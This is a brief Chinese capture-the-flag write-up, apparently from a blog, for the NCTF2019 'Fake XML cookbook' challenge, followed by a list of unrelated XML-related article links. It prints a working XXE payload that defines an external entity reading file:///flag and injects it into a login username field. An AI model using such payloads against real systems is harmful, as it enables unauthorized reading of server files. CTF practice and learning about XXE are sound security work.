[NCTF2019]Fake XML cookbook1

worker..2024-08-05 0:01

打开题目

猜测可能为sql注入,或者绕过,思路查看源码,看有用信息

试输入发现只会返回用户名错误,根据提示XML相对XXE攻击

首先进行抓包,然后构造payload。

复制代码 
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note [
  <!ENTITY admin SYSTEM "file:///flag">
  ]>
<user><username>&admin;</username><password>123456</password></user>

直接就可以得到flag

相关推荐
百***81273 小时前
使用 Logback 的最佳实践:`logback.xml` 与 `logback-spring.xml` 的区别与用法
xml·spring·logback
小小测试开发4 小时前
JMeter XPath提取器用法详解:XML/HTML响应数据提取神器
xml·jmeter·html
♡喜欢做梦6 小时前
MyBatis XML 配置文件:从配置规范到 CRUD 开发实践
xml·java·java-ee·mybatis
还算善良_5 天前
【XML生成】根据JSON格式化的报文,动态生成XML
xml·json
galaxyffang6 天前
skywalking整合logback.xml日志,日志文件出现乱码问题解决
xml·logback·skywalking
百***26637 天前
使用 Logback 的最佳实践:`logback.xml` 与 `logback-spring.xml` 的区别与用法
xml·spring·logback
864记忆7 天前
Qt 对 JSON和XML文件的操作详解
xml·qt·json
a***97687 天前
使用 Logback 的最佳实践:`logback.xml` 与 `logback-spring.xml` 的区别与用法
xml·spring·logback
chxii8 天前
MyBatis 动态 SQL,通过 XML (如 <if>、<foreach> 等)实现灵活的 SQL 拼接。
xml·sql·mybatis
weixin_448771728 天前
SpringBoot默认日志配置文件 logback.xml(log4j+logback)
xml·spring boot·logback
热门推荐
01GitHub 镜像站点02【保姆级教程】免费使用Gemini3的5种方法!免翻墙/国内直连03BongoCat - 跨平台键盘猫动画工具04UV安装并设置国内源05安娜的档案(Anna’s Archive) 镜像网站/国内最新可访问入口(持续更新)06Google Antigravity:无法登录?早期错误、登录修复和用户反馈指南07Linux下V2Ray安装配置指南08全球最强模型Grok4,国内已可免费使用!(附教程)09Labelme从安装到标注:零基础完整指南10Spring Boot 4.0 发布总结:新特性、依赖变更与升级指南